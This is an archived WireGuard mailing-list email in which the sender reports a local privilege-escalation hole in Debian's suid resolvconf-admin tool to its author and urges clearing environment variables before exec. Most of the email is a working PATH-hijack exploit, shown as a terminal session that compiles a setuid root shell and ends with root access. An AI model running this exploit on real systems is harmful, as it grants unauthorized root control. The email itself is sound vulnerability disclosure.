From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Jason@zx2c4.com Received: from krantz.zx2c4.com (localhost [127.0.0.1]) by krantz.zx2c4.com (ZX2C4 Mail Server) with ESMTP id 7daf64c5 for ; Sun, 29 Oct 2017 22:04:24 +0000 (UTC) Received: from frisell.zx2c4.com (frisell.zx2c4.com [192.95.5.64]) by krantz.zx2c4.com (ZX2C4 Mail Server) with ESMTP id adaf536d for ; Sun, 29 Oct 2017 22:04:24 +0000 (UTC) Received: by frisell.zx2c4.com (ZX2C4 Mail Server) with ESMTP id 70967b54 for ; Sun, 29 Oct 2017 22:04:24 +0000 (UTC) Received: by frisell.zx2c4.com (ZX2C4 Mail Server) with ESMTPSA id 5e3d9282 (TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128:NO) for ; Sun, 29 Oct 2017 22:04:24 +0000 (UTC) Received: by mail-oi0-f51.google.com with SMTP id n82so18456563oig.3 for ; Sun, 29 Oct 2017 15:06:32 -0700 (PDT) MIME-Version: 1.0 In-Reply-To: <87ineze3x2.fsf@fifthhorseman.net> References: <3a761178-19bc-1d01-b6a8-9fb801312d47@solidadmin.com> <44ac12fe-685b-730e-8afd-e4081daf038d@solidadmin.com> <92b6b9c5-b07c-52fa-a72a-0fc2dcc253bc@solidadmin.com> <87she4fdol.fsf@fifthhorseman.net> <87ineze3x2.fsf@fifthhorseman.net> From: "Jason A. Donenfeld" Date: Sun, 29 Oct 2017 23:06:31 +0100 Message-ID: Subject: Re: Fixing wg-quick's DNS= directive with a hatchet To: Daniel Kahn Gillmor Content-Type: text/plain; charset="UTF-8" Cc: WireGuard mailing list List-Id: Development discussion of WireGuard List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , On Sat, Oct 28, 2017 at 4:35 PM, Daniel Kahn Gillmor wrote: > I actually shipped the resolvconf-admin package in debian to provide > some kind of filtering interface to avoid total garbage from the network > getting accidentally passed through to arbitrary resolvconf plugins. By the way, the program you wrote introduces a trivial local privilege escalation vulnerability into Debian, since not all available providers of the resolvconf binary set PATH themselves. Always clear environment variables yourself before exec'ing anything in an suid executable. Here's an exploit: unpriv@scw-968260:~$ id uid=1000(unpriv) gid=1000(unpriv) groups=1000(unpriv),114(resolvconf-admins) unpriv@scw-968260:~$ stat /usr/bin/resolvconf-admin File: /usr/bin/resolvconf-admin Size: 24736 Blocks: 56 IO Block: 4096 regular file Device: fd00h/64768d Inode: 2897743 Links: 1 Access: (4754/-rwsr-xr--) Uid: ( 0/ root) Gid: ( 114/resolvconf-admins) Access: 2017-10-29 21:56:25.709185001 +0000 Modify: 2017-10-29 21:55:04.529185001 +0000 Change: 2017-10-29 21:55:41.449185001 +0000 Birth: - unpriv@scw-968260:~$ echo 'main() { setuid(0); setgid(0); execl("/bin/sh", 0); }' > a.c && gcc -o rootshell a.c unpriv@scw-968260:~$ echo "main() { chown(\"$PWD/rootshell\", 0, 0); chmod(\"$PWD/rootshell\", 04755); }" > a.c && gcc -o mkdir a.c unpriv@scw-968260:~$ export PATH="$PWD:$PATH" unpriv@scw-968260:~$ resolvconf-admin add eth0 8.8.8.8 Cannot write to /run/resolvconf/lock unpriv@scw-968260:~$ ./rootshell # id uid=0(root) gid=0(root) groups=0(root),114(resolvconf-admins),1000(unpriv)